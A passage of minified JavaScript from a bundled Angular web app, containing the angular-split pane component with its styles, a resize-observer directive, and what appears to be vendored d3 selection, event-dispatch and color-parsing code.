n=this.gutterEls.find(r=>r.nativeElement.style.order===`${i.order+i.gutterBeforeCollapse}`);n&&this.renderer.removeClass(n.nativeElement,"as-split-gutter-collapsed"),this.updateArea(e,!1,!1)}getAriaAreaSizeText(e){return null===e?null:e.toFixed(0)+" "+this.unit}}return t.\u0275fac=function(e){return new(e||t)(Ee(qi),Ee(mi),Ee(Ma),Ee(wr),Ee(OMe,8))},t.\u0275cmp=Wt({type:t,selectors:[["as-split"]],viewQuery:function(e,i){if(1&e&&Mi(DMe,5),2&e){let n;Vt(n=Bt())&&(i.gutterEls=n)}},inputs:{direction:"direction",unit:"unit",gutterSize:"gutterSize",gutterStep:"gutterStep",restrictMove:"restrictMove",useTransition:"useTransition",disabled:"disabled",dir:"dir",gutterDblClickDuration:"gutterDblClickDuration",gutterClickDeltaPx:"gutterClickDeltaPx",gutterAriaLabel:"gutterAriaLabel"},outputs:{transitionEnd:"transitionEnd",dragStart:"dragStart",dragEnd:"dragEnd",gutterClick:"gutterClick",gutterDblClick:"gutterDblClick"},exportAs:["asSplit"],ngContentSelectors:IMe,decls:2,vars:1,consts:[["ngFor","",3,"ngForOf"],["role","slider","tabindex","0","class","as-split-gutter",3,"flex-basis","order","keydown","mousedown","touchstart","mouseup","touchend",4,"ngIf"],["role","slider","tabindex","0",1,"as-split-gutter",3,"keydown","mousedown","touchstart","mouseup","touchend"],["gutterEls",""],[1,"as-split-gutter-icon"]],template:function(e,i){1&e&&(Jn(),va(0),ne(1,wMe,1,1,"ng-template",0)),2&e&&(C(1),V("ngForOf",i.displayedAreas))},dependencies:[Zi,Ri],styles:["[_nghost-%COMP%]{display:flex;flex-wrap:nowrap;justify-content:flex-start;align-items:stretch;overflow:hidden;width:100%;height:100%}[_nghost-%COMP%] > .as-split-gutter[_ngcontent-%COMP%]{border:none;flex-grow:0;flex-shrink:0;background-color:#eee;display:flex;align-items:center;justify-content:center}[_nghost-%COMP%] > .as-split-gutter.as-split-gutter-collapsed[_ngcontent-%COMP%]{flex-basis:1px!important;pointer-events:none}[_nghost-%COMP%] > .as-split-gutter[_ngcontent-%COMP%] > .as-split-gutter-icon[_ngcontent-%COMP%]{width:100%;height:100%;background-position:center center;background-repeat:no-repeat}[_nghost-%COMP%]    >.as-split-area{flex-grow:0;flex-shrink:0;overflow-x:hidden;overflow-y:auto}[_nghost-%COMP%]    >.as-split-area.as-hidden{flex:0 1 0px!important;overflow-x:hidden;overflow-y:hidden}.as-horizontal[_nghost-%COMP%]{flex-direction:row}.as-horizontal[_nghost-%COMP%] > .as-split-gutter[_ngcontent-%COMP%]{flex-direction:row;cursor:col-resize;height:100%}.as-horizontal[_nghost-%COMP%] > .as-split-gutter[_ngcontent-%COMP%] > .as-split-gutter-icon[_ngcontent-%COMP%]{background-image:url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAUAAAAeCAYAAADkftS9AAAAIklEQVQoU2M4c+bMfxAGAgYYmwGrIIiDjrELjpo5aiZeMwF+yNnOs5KSvgAAAABJRU5ErkJggg==)}.as-horizontal[_nghost-%COMP%]    >.as-split-area{height:100%}.as-vertical[_nghost-%COMP%]{flex-direction:column}.as-vertical[_nghost-%COMP%] > .as-split-gutter[_ngcontent-%COMP%]{flex-direction:column;cursor:row-resize;width:100%}.as-vertical[_nghost-%COMP%] > .as-split-gutter[_ngcontent-%COMP%]   .as-split-gutter-icon[_ngcontent-%COMP%]{background-image:url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAB4AAAAFCAMAAABl/6zIAAAABlBMVEUAAADMzMzIT8AyAAAAAXRSTlMAQObYZgAAABRJREFUeAFjYGRkwIMJSeMHlBkOABP7AEGzSuPKAAAAAElFTkSuQmCC)}.as-vertical[_nghost-%COMP%]    >.as-split-area{width:100%}.as-vertical[_nghost-%COMP%]    >.as-split-area.as-hidden{max-width:0}.as-disabled[_nghost-%COMP%] > .as-split-gutter[_ngcontent-%COMP%]{cursor:default}.as-disabled[_nghost-%COMP%] > .as-split-gutter[_ngcontent-%COMP%]   .as-split-gutter-icon[_ngcontent-%COMP%]{background-image:url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAUAAAAeCAYAAADkftS9AAAAIklEQVQoU2M4c+bMfxAGAgYYmwGrIIiDjrELjpo5aiZeMwF+yNnOs5KSvgAAAABJRU5ErkJggg==)}.as-transition.as-init[_nghost-%COMP%]:not(.as-dragging) > .as-split-gutter[_ngcontent-%COMP%], .as-transition.as-init[_nghost-%COMP%]:not(.as-dragging)    >.as-split-area{transition:flex-basis .3s}"],changeDetection:0}),t})(),Dp=(()=>{class t{constructor(e,i,n,r){this.ngZone=e,this.elRef=i,this.renderer=n,this.split=r,this._order=null,this._size=null,this._minSize=null,this._maxSize=null,this._lockSize=!1,this._visible=!0,this.lockListeners=[],this.renderer.addClass(this.elRef.nativeElement,"as-split-area")}set order(e){this._order=Ep(e,null),this.split.updateArea(this,!0,!1)}get order(){return this._order}set size(e){this._size=Ep(e,null),this.split.updateArea(this,!1,!0)}get size(){return this._size}set minSize(e){this._minSize=Ep(e,null),this.split.updateArea(this,!1,!0)}get minSize(){return this._minSize}set maxSize(e){this._maxSize=Ep(e,null),this.split.updateArea(this,!1,!0)}get maxSize(){return this._maxSize}set lockSize(e){this._lockSize=Db(e),this.split.updateArea(this,!1,!0)}get lockSize(){return this._lockSize}set visible(e){this._visible=Db(e),this._visible?(this.split.showArea(this),this.renderer.removeClass(this.elRef.nativeElement,"as-hidden")):(this.split.hideArea(this),this.renderer.addClass(this.elRef.nativeElement,"as-hidden"))}get visible(){return this._visible}ngOnInit(){this.split.addArea(this),this.ngZone.runOutsideAngular(()=>{this.transitionListener=this.renderer.listen(this.elRef.nativeElement,"transitionend",e=>{"flex-basis"===e.propertyName&&this.split.notify("transitionEnd",-1)})})}setStyleOrder(e){this.renderer.setStyle(this.elRef.nativeElement,"order",e)}setStyleFlex(e,i,n,r,c){this.renderer.setStyle(this.elRef.nativeElement,"flex-grow",e),this.renderer.setStyle(this.elRef.nativeElement,"flex-shrink",i),this.renderer.setStyle(this.elRef.nativeElement,"flex-basis",n),!0===r?this.renderer.addClass(this.elRef.nativeElement,"as-min"):this.renderer.removeClass(this.elRef.nativeElement,"as-min"),!0===c?this.renderer.addClass(this.elRef.nativeElement,"as-max"):this.renderer.removeClass(this.elRef.nativeElement,"as-max")}lockEvents(){this.ngZone.runOutsideAngular(()=>{this.lockListeners.push(this.renderer.listen(this.elRef.nativeElement,"selectstart",()=>!1)),this.lockListeners.push(this.renderer.listen(this.elRef.nativeElement,"dragstart",()=>!1))})}unlockEvents(){for(;this.lockListeners.length>0;){const e=this.lockListeners.pop();e&&e()}}ngOnDestroy(){this.unlockEvents(),this.transitionListener&&this.transitionListener(),this.split.removeArea(this)}collapse(e=0,i="right"){this.split.collapseArea(this,e,i)}expand(){this.split.expandArea(this)}}return t.\u0275fac=function(e){return new(e||t)(Ee(qi),Ee(mi),Ee(wr),Ee(Zh))},t.\u0275dir=Ot({type:t,selectors:[["as-split-area"],["","as-split-area",""]],inputs:{order:"order",size:"size",minSize:"minSize",maxSize:"maxSize",lockSize:"lockSize",visible:"visible"},exportAs:["asSplitArea"]}),t})(),sH=(()=>{class t{static forRoot(){return console.warn("AngularSplitModule.forRoot() is deprecated and will be removed in v6"),{ngModule:t,providers:[]}}static forChild(){return console.warn("AngularSplitModule.forChild() is deprecated and will be removed in v6"),{ngModule:t,providers:[]}}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[rn]}),t})();class xb{constructor(a,e){this.newRect=a,this.oldRect=e,this.isFirst=null==e}}let NMe=(()=>{class t{constructor(e,i){this.element=e,this.zone=i,this.resized=new Tt,this.observer=new ResizeObserver(n=>this.zone.run(()=>this.observe(n)))}ngOnInit(){this.observer.observe(this.element.nativeElement)}ngOnDestroy(){this.observer.disconnect()}observe(e){const i=e[0],n=new xb(i.contentRect,this.oldRect);this.oldRect=i.contentRect,this.resized.emit(n)}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi),Ee(qi))},t.\u0275dir=Ot({type:t,selectors:[["","resized",""]],outputs:{resized:"resized"}}),t})(),cH=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({}),t})();function LMe(){}function iI(t){return null==t?LMe:function(){return this.querySelector(t)}}function lH(t){return"object"==typeof t&&"length"in t?t:Array.from(t)}function WMe(){return[]}function dH(t){return null==t?WMe:function(){return this.querySelectorAll(t)}}function mH(t){return function(){return this.matches(t)}}function uH(t){return function(a){return a.matches(t)}}var BMe=Array.prototype.find;function UMe(){return this.firstElementChild}var GMe=Array.prototype.filter;function jMe(){return this.children}function hH(t){return new Array(t.length)}function NA(t,a){this.ownerDocument=t.ownerDocument,this.namespaceURI=t.namespaceURI,this._next=null,this._parent=t,this.__data__=a}function YMe(t){return function(){return t}}function JMe(t,a,e,i,n,r){for(var d,c=0,T=a.length,k=r.length;c<k;++c)(d=a[c])?(d.__data__=r[c],i[c]=d):e[c]=new NA(t,r[c]);for(;c<T;++c)(d=a[c])&&(n[c]=d)}function ZMe(t,a,e,i,n,r,c){var d,T,pe,k=new Map,q=a.length,Y=r.length,te=new Array(q);for(d=0;d<q;++d)(T=a[d])&&(te[d]=pe=c.call(T,T.__data__,d,a)+"",k.has(pe)?n[d]=T:k.set(pe,T));for(d=0;d<Y;++d)pe=c.call(t,r[d],d,r)+"",(T=k.get(pe))?(i[d]=T,T.__data__=r[d],k.delete(pe)):e[d]=new NA(t,r[d]);for(d=0;d<q;++d)(T=a[d])&&k.get(te[d])===T&&(n[d]=T)}function eve(t){return t.__data__}function sve(t,a){return t<a?-1:t>a?1:t>=a?0:NaN}NA.prototype={constructor:NA,appendChild:function(t){return this._parent.insertBefore(t,this._next)},insertBefore:function(t,a){return this._parent.insertBefore(t,a)},querySelector:function(t){return this._parent.querySelector(t)},querySelectorAll:function(t){return this._parent.querySelectorAll(t)}};var aI="http://www.w3.org/1999/xhtml";const fH={svg:"http://www.w3.org/2000/svg",xhtml:aI,xlink:"http://www.w3.org/1999/xlink",xml:"http://www.w3.org/XML/1998/namespace",xmlns:"http://www.w3.org/2000/xmlns/"};function LA(t){var a=t+="",e=a.indexOf(":");return e>=0&&"xmlns"!==(a=t.slice(0,e))&&(t=t.slice(e+1)),fH.hasOwnProperty(a)?{space:fH[a],local:t}:t}function fve(t){return function(){this.removeAttribute(t)}}function pve(t){return function(){this.removeAttributeNS(t.space,t.local)}}function _ve(t,a){return function(){this.setAttribute(t,a)}}function gve(t,a){return function(){this.setAttributeNS(t.space,t.local,a)}}function Cve(t,a){return function(){var e=a.apply(this,arguments);null==e?this.removeAttribute(t):this.setAttribute(t,e)}}function yve(t,a){return function(){var e=a.apply(this,arguments);null==e?this.removeAttributeNS(t.space,t.local):this.setAttributeNS(t.space,t.local,e)}}function pH(t){return t.ownerDocument&&t.ownerDocument.defaultView||t.document&&t||t.defaultView}function Mve(t){return function(){this.style.removeProperty(t)}}function vve(t,a,e){return function(){this.style.setProperty(t,a,e)}}function Ave(t,a,e){return function(){var i=a.apply(this,arguments);null==i?this.style.removeProperty(t):this.style.setProperty(t,i,e)}}function Y1(t,a){return t.style.getPropertyValue(a)||pH(t).getComputedStyle(t,null).getPropertyValue(a)}function Eve(t){return function(){delete this[t]}}function Dve(t,a){return function(){this[t]=a}}function xve(t,a){return function(){var e=a.apply(this,arguments);null==e?delete this[t]:this[t]=e}}function _H(t){return t.trim().split(/^|\s+/)}function nI(t){return t.classList||new gH(t)}function gH(t){this._node=t,this._names=_H(t.getAttribute("class")||"")}function CH(t,a){for(var e=nI(t),i=-1,n=a.length;++i<n;)e.add(a[i])}function yH(t,a){for(var e=nI(t),i=-1,n=a.length;++i<n;)e.remove(a[i])}function Ive(t){return function(){CH(this,t)}}function Rve(t){return function(){yH(this,t)}}function Sve(t,a){return function(){(a.apply(this,arguments)?CH:yH)(this,t)}}function Pve(){this.textContent=""}function Ove(t){return function(){this.textContent=t}}function Nve(t){return function(){var a=t.apply(this,arguments);this.textContent=null==a?"":a}}function zve(){this.innerHTML=""}function Wve(t){return function(){this.innerHTML=t}}function Fve(t){return function(){var a=t.apply(this,arguments);this.innerHTML=null==a?"":a}}function Bve(){this.nextSibling&&this.parentNode.appendChild(this)}function Uve(){this.previousSibling&&this.parentNode.insertBefore(this,this.parentNode.firstChild)}function Gve(t){return function(){var a=this.ownerDocument,e=this.namespaceURI;return e===aI&&a.documentElement.namespaceURI===aI?a.createElement(t):a.createElementNS(e,t)}}function jve(t){return function(){return this.ownerDocument.createElementNS(t.space,t.local)}}function bH(t){var a=LA(t);return(a.local?jve:Gve)(a)}function $ve(){return null}function Xve(){var t=this.parentNode;t&&t.removeChild(this)}function Jve(){var t=this.cloneNode(!1),a=this.parentNode;return a?a.insertBefore(t,this.nextSibling):t}function Zve(){var t=this.cloneNode(!0),a=this.parentNode;return a?a.insertBefore(t,this.nextSibling):t}function a4e(t){return t.trim().split(/^|\s+/).map(function(a){var e="",i=a.indexOf(".");return i>=0&&(e=a.slice(i+1),a=a.slice(0,i)),{type:a,name:e}})}function n4e(t){return function(){var a=this.__on;if(a){for(var r,e=0,i=-1,n=a.length;e<n;++e)r=a[e],t.type&&r.type!==t.type||r.name!==t.name?a[++i]=r:this.removeEventListener(r.type,r.listener,r.options);++i?a.length=i:delete this.__on}}}function o4e(t,a,e){return function(){var n,i=this.__on,r=function i4e(t){return function(a){t.call(this,a,this.__data__)}}(a);if(i)for(var c=0,d=i.length;c<d;++c)if((n=i[c]).type===t.type&&n.name===t.name)return this.removeEventListener(n.type,n.listener,n.options),this.addEventListener(n.type,n.listener=r,n.options=e),void(n.value=a);this.addEventListener(t.type,r,e),n={type:t.type,name:t.name,value:a,listener:r,options:e},i?i.push(n):this.__on=[n]}}function MH(t,a,e){var i=pH(t),n=i.CustomEvent;"function"==typeof n?n=new n(a,e):(n=i.document.createEvent("Event"),e?(n.initEvent(a,e.bubbles,e.cancelable),n.detail=e.detail):n.initEvent(a,!1,!1)),t.dispatchEvent(n)}function s4e(t,a){return function(){return MH(this,t,a)}}function c4e(t,a){return function(){return MH(this,t,a.apply(this,arguments))}}gH.prototype={add:function(t){this._names.indexOf(t)<0&&(this._names.push(t),this._node.setAttribute("class",this._names.join(" ")))},remove:function(t){var a=this._names.indexOf(t);a>=0&&(this._names.splice(a,1),this._node.setAttribute("class",this._names.join(" ")))},contains:function(t){return this._names.indexOf(t)>=0}};var vH=[null];function Il(t,a){this._groups=t,this._parents=a}function AH(){return new Il([[document.documentElement]],vH)}Il.prototype=AH.prototype={constructor:Il,select:function zMe(t){"function"!=typeof t&&(t=iI(t));for(var a=this._groups,e=a.length,i=new Array(e),n=0;n<e;++n)for(var T,k,r=a[n],c=r.length,d=i[n]=new Array(c),q=0;q<c;++q)(T=r[q])&&(k=t.call(T,T.__data__,q,r))&&("__data__"in T&&(k.__data__=T.__data__),d[q]=k);return new Il(i,this._parents)},selectAll:function VMe(t){t="function"==typeof t?function FMe(t){return function(){var a=t.apply(this,arguments);return null==a?[]:lH(a)}}(t):dH(t);for(var a=this._groups,e=a.length,i=[],n=[],r=0;r<e;++r)for(var T,c=a[r],d=c.length,k=0;k<d;++k)(T=c[k])&&(i.push(t.call(T,T.__data__,k,c)),n.push(T));return new Il(i,n)},selectChild:function qMe(t){return this.select(null==t?UMe:function HMe(t){return function(){return BMe.call(this.children,t)}}("function"==typeof t?t:uH(t)))},selectChildren:function $Me(t){return this.selectAll(null==t?jMe:function QMe(t){return function(){return GMe.call(this.children,t)}}("function"==typeof t?t:uH(t)))},filter:function KMe(t){"function"!=typeof t&&(t=mH(t));for(var a=this._groups,e=a.length,i=new Array(e),n=0;n<e;++n)for(var T,r=a[n],c=r.length,d=i[n]=[],k=0;k<c;++k)(T=r[k])&&t.call(T,T.__data__,k,r)&&d.push(T);return new Il(i,this._parents)},data:function tve(t,a){if(!arguments.length)return Array.from(this,eve);var e=a?ZMe:JMe,i=this._parents,n=this._groups;"function"!=typeof t&&(t=YMe(t));for(var r=n.length,c=new Array(r),d=new Array(r),T=new Array(r),k=0;k<r;++k){var q=i[k],Y=n[k],te=Y.length,pe=lH(t.call(q,q&&q.__data__,k,i)),Re=pe.length,Fe=d[k]=new Array(Re),Ne=c[k]=new Array(Re),et=T[k]=new Array(te);e(q,Y,Fe,Ne,et,pe,a);for(var yt,It,ut=0,Ze=0;ut<Re;++ut)if(yt=Fe[ut]){for(ut>=Ze&&(Ze=ut+1);!(It=Ne[Ze])&&++Ze<Re;);yt._next=It||null}}return(c=new Il(c,i))._enter=d,c._exit=T,c},enter:function XMe(){return new Il(this._enter||this._groups.map(hH),this._parents)},exit:function ive(){return new Il(this._exit||this._groups.map(hH),this._parents)},join:function ave(t,a,e){var i=this.enter(),n=this,r=this.exit();return i="function"==typeof t?t(i):i.append(t+""),null!=a&&(n=a(n)),null==e?r.remove():e(r),i&&n?i.merge(n).order():n},merge:function nve(t){if(!(t instanceof Il))throw new Error("invalid merge");for(var a=this._groups,e=t._groups,i=a.length,r=Math.min(i,e.length),c=new Array(i),d=0;d<r;++d)for(var te,T=a[d],k=e[d],q=T.length,Y=c[d]=new Array(q),pe=0;pe<q;++pe)(te=T[pe]||k[pe])&&(Y[pe]=te);for(;d<i;++d)c[d]=a[d];return new Il(c,this._parents)},selection:function m4e(){return this},order:function ove(){for(var t=this._groups,a=-1,e=t.length;++a<e;)for(var c,i=t[a],n=i.length-1,r=i[n];--n>=0;)(c=i[n])&&(r&&4^c.compareDocumentPosition(r)&&r.parentNode.insertBefore(c,r),r=c);return this},sort:function rve(t){function a(Y,te){return Y&&te?t(Y.__data__,te.__data__):!Y-!te}t||(t=sve);for(var e=this._groups,i=e.length,n=new Array(i),r=0;r<i;++r){for(var k,c=e[r],d=c.length,T=n[r]=new Array(d),q=0;q<d;++q)(k=c[q])&&(T[q]=k);T.sort(a)}return new Il(n,this._parents).order()},call:function cve(){var t=arguments[0];return arguments[0]=this,t.apply(null,arguments),this},nodes:function lve(){return Array.from(this)},node:function dve(){for(var t=this._groups,a=0,e=t.length;a<e;++a)for(var i=t[a],n=0,r=i.length;n<r;++n){var c=i[n];if(c)return c}return null},size:function mve(){let t=0;for(const a of this)++t;return t},empty:function uve(){return!this.node()},each:function hve(t){for(var a=this._groups,e=0,i=a.length;e<i;++e)for(var d,n=a[e],r=0,c=n.length;r<c;++r)(d=n[r])&&t.call(d,d.__data__,r,n);return this},attr:function bve(t,a){var e=LA(t);if(arguments.length<2){var i=this.node();return e.local?i.getAttributeNS(e.space,e.local):i.getAttribute(e)}return this.each((null==a?e.local?pve:fve:"function"==typeof a?e.local?yve:Cve:e.local?gve:_ve)(e,a))},style:function Tve(t,a,e){return arguments.length>1?this.each((null==a?Mve:"function"==typeof a?Ave:vve)(t,a,null==e?"":e)):Y1(this.node(),t)},property:function wve(t,a){return arguments.length>1?this.each((null==a?Eve:"function"==typeof a?xve:Dve)(t,a)):this.node()[t]},classed:function kve(t,a){var e=_H(t+"");if(arguments.length<2){for(var i=nI(this.node()),n=-1,r=e.length;++n<r;)if(!i.contains(e[n]))return!1;return!0}return this.each(("function"==typeof a?Sve:a?Ive:Rve)(e,a))},text:function Lve(t){return arguments.length?this.each(null==t?Pve:("function"==typeof t?Nve:Ove)(t)):this.node().textContent},html:function Vve(t){return arguments.length?this.each(null==t?zve:("function"==typeof t?Fve:Wve)(t)):this.node().innerHTML},raise:function Hve(){return this.each(Bve)},lower:function qve(){return this.each(Uve)},append:function Qve(t){var a="function"==typeof t?t:bH(t);return this.select(function(){return this.appendChild(a.apply(this,arguments))})},insert:function Kve(t,a){var e="function"==typeof t?t:bH(t),i=null==a?$ve:"function"==typeof a?a:iI(a);return this.select(function(){return this.insertBefore(e.apply(this,arguments),i.apply(this,arguments)||null)})},remove:function Yve(){return this.each(Xve)},clone:function e4e(t){return this.select(t?Zve:Jve)},datum:function t4e(t){return arguments.length?this.property("__data__",t):this.node().__data__},on:function r4e(t,a,e){var n,c,i=a4e(t+""),r=i.length;if(!(arguments.length<2)){for(d=a?o4e:n4e,n=0;n<r;++n)this.each(d(i[n],a,e));return this}var d=this.node().__on;if(d)for(var q,T=0,k=d.length;T<k;++T)for(n=0,q=d[T];n<r;++n)if((c=i[n]).type===q.type&&c.name===q.name)return q.value},dispatch:function l4e(t,a){return this.each(("function"==typeof a?c4e:s4e)(t,a))},[Symbol.iterator]:function*d4e(){for(var t=this._groups,a=0,e=t.length;a<e;++a)for(var c,i=t[a],n=0,r=i.length;n<r;++n)(c=i[n])&&(yield c)}};const wb=AH;var u4e={value:()=>{}};function TH(){for(var i,t=0,a=arguments.length,e={};t<a;++t){if(!(i=arguments[t]+"")||i in e||/[\s.]/.test(i))throw new Error("illegal type: "+i);e[i]=[]}return new zA(e)}function zA(t){this._=t}function h4e(t,a){return t.trim().split(/^|\s+/).map(function(e){var i="",n=e.indexOf(".");if(n>=0&&(i=e.slice(n+1),e=e.slice(0,n)),e&&!a.hasOwnProperty(e))throw new Error("unknown type: "+e);return{type:e,name:i}})}function f4e(t,a){for(var n,e=0,i=t.length;e<i;++e)if((n=t[e]).name===a)return n.value}function EH(t,a,e){for(var i=0,n=t.length;i<n;++i)if(t[i].name===a){t[i]=u4e,t=t.slice(0,i).concat(t.slice(i+1));break}return null!=e&&t.push({name:a,value:e}),t}zA.prototype=TH.prototype={constructor:zA,on:function(t,a){var n,e=this._,i=h4e(t+"",e),r=-1,c=i.length;if(!(arguments.length<2)){if(null!=a&&"function"!=typeof a)throw new Error("invalid callback: "+a);for(;++r<c;)if(n=(t=i[r]).type)e[n]=EH(e[n],t.name,a);else if(null==a)for(n in e)e[n]=EH(e[n],t.name,null);return this}for(;++r<c;)if((n=(t=i[r]).type)&&(n=f4e(e[n],t.name)))return n},copy:function(){var t={},a=this._;for(var e in a)t[e]=a[e].slice();return new zA(t)},call:function(t,a){if((n=arguments.length-2)>0)for(var n,r,e=new Array(n),i=0;i<n;++i)e[i]=arguments[i+2];if(!this._.hasOwnProperty(t))throw new Error("unknown type: "+t);for(i=0,n=(r=this._[t]).length;i<n;++i)r[i].value.apply(a,e)},apply:function(t,a,e){if(!this._.hasOwnProperty(t))throw new Error("unknown type: "+t);for(var i=this._[t],n=0,r=i.length;n<r;++n)i[n].value.apply(a,e)}};const DH=TH;function rI(t,a,e){t.prototype=a.prototype=e,e.constructor=t}function xH(t,a){var e=Object.create(t.prototype);for(var i in a)e[i]=a[i];return e}function Ib(){}var WA=1/.7,J1="\\s*([+-]?\\d+)\\s*",Sb="\\s*([+-]?\\d*\\.?\\d+(?:[eE][+-]?\\d+)?)\\s*",wu="\\s*([+-]?\\d*\\.?\\d+(?:[eE][+-]?\\d+)?)%\\s*",g4e=/^#([0-9a-f]{3,8})$/,C4e=new RegExp("^rgb\\("+[J1,J1,J1]+"\\)$"),y4e=new RegExp("^rgb\\("+[wu,wu,wu]+"\\)$"),b4e=new RegExp("^rgba\\("+[J1,J1,J1,Sb]+"\\)$"),M4e=new RegExp("^rgba\\("+[wu,wu,wu,Sb]+"\\)$"),v4e=new RegExp("^hsl\\("+[Sb,wu,wu]+"\\)$"),A4e=new RegExp("^hsla\\("+[Sb,wu,wu,Sb]+"\\)$"),wH={aliceblue:15792383,antiquewhite:16444375,aqua:65535,aquamarine:8388564,azure:15794175,beige:16119260,bisque:16770244,black:0,blanchedalmond:16772045,blue:255,blueviolet:9055202,brown:10824234,burlywood:14596231,cadetblue:6266528,chartreuse:8388352,chocolate:13789470,coral:16744272,cornflowerblue:6591981,cornsilk:16775388,crimson:14423100,cyan:65535,darkblue:139,darkcyan:35723,darkgoldenrod:12092939,darkgray:11119017,darkgreen:25600,darkgrey:11119017,darkkhaki:12433259,darkmagenta:9109643,darkolivegreen:5597999,darkorange:16747520,darkorchid:10040012,darkred:9109504,darksalmon:15308410,darkseagreen:9419919,darkslateblue:4734347,darkslategray:3100495,darkslategrey:3100495,darkturquoise:52945,darkviolet:9699539,deeppink:16716947,deepskyblue:49151,dimgray:6908265,dimgrey:6908265,dodgerblue:2003199,firebrick:11674146,floralwhite:16775920,forestgreen:2263842,fuchsia:16711935,gainsboro:14474460,ghostwhite:16316671,gold:16766720,goldenrod:14329120,gray:8421504,green:32768,greenyellow:11403055,grey:8421504,honeydew:15794160,hotpink:16738740,indianred:13458524,indigo:4915330,ivory:16777200,khaki:15787660,lavender:15132410,lavenderblush:16773365,lawngreen:8190976,lemonchiffon:16775885,lightblue:11393254,lightcoral:15761536,lightcyan:14745599,lightgoldenrodyellow:16448210,lightgray:13882323,lightgreen:9498256,lightgrey:13882323,lightpink:16758465,lightsalmon:16752762,lightseagreen:2142890,lightskyblue:8900346,lightslategray:7833753,lightslategrey:7833753,lightsteelblue:11584734,lightyellow:16777184,lime:65280,limegreen:3329330,linen:16445670,magenta:16711935,maroon:8388608,mediumaquamarine:6737322,mediumblue:205,mediumorchid:12211667,mediumpurple:9662683,mediumseagreen:3978097,mediumslateblue:8087790,mediumspringgreen:64154,mediumturquoise:4772300,mediumvioletred:13047173,midnightblue:1644912,mintcream:16121850,mistyrose:16770273,moccasin:16770229,navajowhite:16768685,navy:128,oldlace:16643558,olive:8421376,olivedrab:7048739,orange:16753920,orangered:16729344,orchid:14315734,palegoldenrod:15657130,palegreen:10025880,paleturquoise:11529966,palevioletred:14381203,papayawhip:16773077,peachpuff:16767673,peru:13468991,pink:16761035,plum:14524637,powderblue:11591910,purple:8388736,rebeccapurple:6697881,red:16711680,rosybrown:12357519,royalblue:4286945,saddlebrown:9127187,salmon:16416882,sandybrown:16032864,seagreen:3050327,seashell:16774638,sienna:10506797,silver:12632256,skyblue:8900331,slateblue:6970061,slategray:7372944,slategrey:7372944,snow:16775930,springgreen:65407,steelblue:4620980,tan:13808780,teal:32896,thistle:14204888,tomato:16737095,turquoise:4251856,violet:15631086,wheat:16113331,white:16777215,whitesmoke:16119285,yellow:16776960,yellowgreen:10145074};function IH(){return this.rgb().formatHex()}function RH(){return this.rgb().formatRgb()}function Dg(t){var a,e;return t=(t+"").trim().toLowerCase(),(a=g4e.exec(t))?(e=a[1].length,a=parseInt(a[1],16),6===e?SH(a):3===e?new $l(a>>8&15|a>>4&240,a>>4&15|240&a,(15&a)<<4|15&a,1):8===e?FA(a>>24&255,a>>16&255,a>>8&255,(255&a)/255):4===e?FA(a>>12&15|a>>8&240,a>>8&15|a>>4&240,a>>4&15|240&a,((15&a)<<4|15&a)/255):null):(a=C4e.exec(t))?new $l(a[1],a[2],a[3],1):(a=y4e.exec(t))?new $l(255*a[1]/100,255*a[2]/100,255*a[3]/100,1):(a=b4e.exec(t))?FA(a[1],a[2],a[3],a[4]):(a=M4e.exec(t))?FA(255*a[1]/100,255*a[2]/100,255*a[3]/100,a[4]):(a=v4e.exec(t))?OH(a[1],a[2]/100,a[3]/100,1):(a=A4e.exec(t))?OH(a[1],a[2]/100,a[3]/100,a[4]):wH.hasOwnProperty(t)?SH(wH[t]):"transparent"===t?new $l(NaN,NaN,NaN,0):null}function SH(t){return new $l(t>>16&255,t>>8&255,255&t,1)}function FA(t,a,e,i){return i<=0&&(t=a=e=NaN),new $l(t,a,e,i)}function E4e(t){return t instanceof Ib||(t=Dg(t)),t?new $l((t=t.rgb()).r,t.g,t.b,t.opacity):new $l}function VA(t,a,e,i){return 1===arguments.length?E4e(t):new $l(t,a,e,null==i?1:i)}function $l(t,a,e,i){this.r=+t,this.g=+a,this.b=+e,this.opacity=+i}function kH(){return"#"+sI(this.r)+sI(this.g)+sI(this.b)}function PH(){var t=this.opacity;return(1===(t=isNaN(t)?1:Math.max(0,Math.min(1,t)))?"rgb(":"rgba(")+Math.max(0,Math.min(255,Math.round(this.r)||0))+", "+Math.max(0,Math.min(255,Math.round(this.g)||0))+", "+Math.max(0,Math.min(255,Math.round(this.b)||0))+(1===t?")":", "+t+")")}function sI(t){return((t=Math.max(0,Math.min(255,Math.round(t)||0)))<16?"0":"")+t.toString(16)}function OH(t,a,e,i){return i<=0?t=a=e=NaN:e<=0||e>=1?t=a=NaN:a<=0&&(t=NaN),new Iu(t,a,e,i)}function NH(t){if(t instanceof Iu)return new Iu(t.h,t.s,t.l,t.opacity);if(t instanceof Ib||(t=Dg(t)),!t)return new Iu;if(t instanceof Iu)return t;var a=(t=t.rgb()).r/255,e=t.g/255,i=t.b/255,n=Math.min(a,e,i),r=Math.max(a,e,i),c=NaN,d=r-n,T=(r+n)/2;return d?(c=a===r?(e-i)/d+6*(e<i):e===r?(i-a)/d+2:(a-e)/d+4,d/=T<.5?r+n:2-r-n,c*=60):d=T>0&&T<1?0:c,new Iu(c,d,T,t.opacity)}function Iu(t,a,e,i){this.h=+t,this.s=+a,this.l=+e,this.opacity=+i}function cI(t,a,e){return 255*(t<60?a+(e-a)*t/60:t<180?e:t<240?a+(e-a)*(240-t)/60:a)}function LH(t,a,e,i,n){var r=t*t,c=r*t;return((1-3*t+3*r-c)*a+(4-6*r+3*c)*e+(1+3*t+3*r-3*c)*i+c*n)/6}rI(Ib,Dg,{copy:function(t){return Object.assign(new this.constructor,this,t)},displayable:function(){return this.rgb().displayable()},hex:IH,formatHex:IH,formatHsl:function T4e(){return NH(this).formatHsl()},formatRgb:RH,toString:RH}),rI($l,VA,xH(Ib,{brighter:function(t){return t=null==t?WA:Math.pow(WA,t),new $l(this.r*t,this.g*t,this.b*t,this.opacity)},darker:function(t){return t=null==t?.7:Math.pow(.7,t),new $l(this.r*t,this.g*t,this.b*t,this.opacity)},rgb:function(){return 